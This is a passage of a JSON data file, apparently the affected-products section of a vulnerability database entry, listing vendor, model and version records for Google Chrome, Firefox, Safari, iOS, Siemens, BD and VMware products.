        "version": "37.0.2062.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.213"
      },
      {
        "_id": null,
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.23"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "36.0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.32"
      },
      {
        "_id": null,
        "model": "simatic field pg m5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22.1.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1010"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.113"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.337"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.51"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.4"
      },
      {
        "_id": null,
        "model": "pyxis medstation console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "40000"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.15"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.27"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.170"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "_id": null,
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1051"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.98"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.112"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.87"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "22.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.119"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.45"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.896.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.417.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.218"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.334"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.657.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "37.0.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "52.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1049"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.331"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1057"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1673.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.689.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.39"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "43.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.55"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1288.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "40"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.390.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1655.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.707.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.38"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1081.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.50"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1011.1"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.9"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "47"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1067.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.44"
      },
      {
        "_id": null,
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1664.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.801.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.1"
      },
      {
        "_id": null,
        "model": "rowa smart",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1048.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.807.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.865.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.86"
      },
      {
        "_id": null,
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1296.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.481.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.489.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.55"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.6"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.121"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.97"
      },
      {
        "_id": null,
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.10.1"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.69"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.47"
      },
      {
        "_id": null,
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.69"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.91"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.50"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3080.5"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.104"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.96"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.572.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.29"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.93"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "18.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.786.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "36.0.1985.122"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.20"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.59"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1039.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.836.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.23"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.14"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.1"
      },
      {
        "_id": null,
        "model": "lsrfortessa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "x-200"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.216"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.591.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454.101"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.107"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.168"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "8.0.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.278.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.413.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.580.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.146"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.513.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.29"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.30"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "24.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
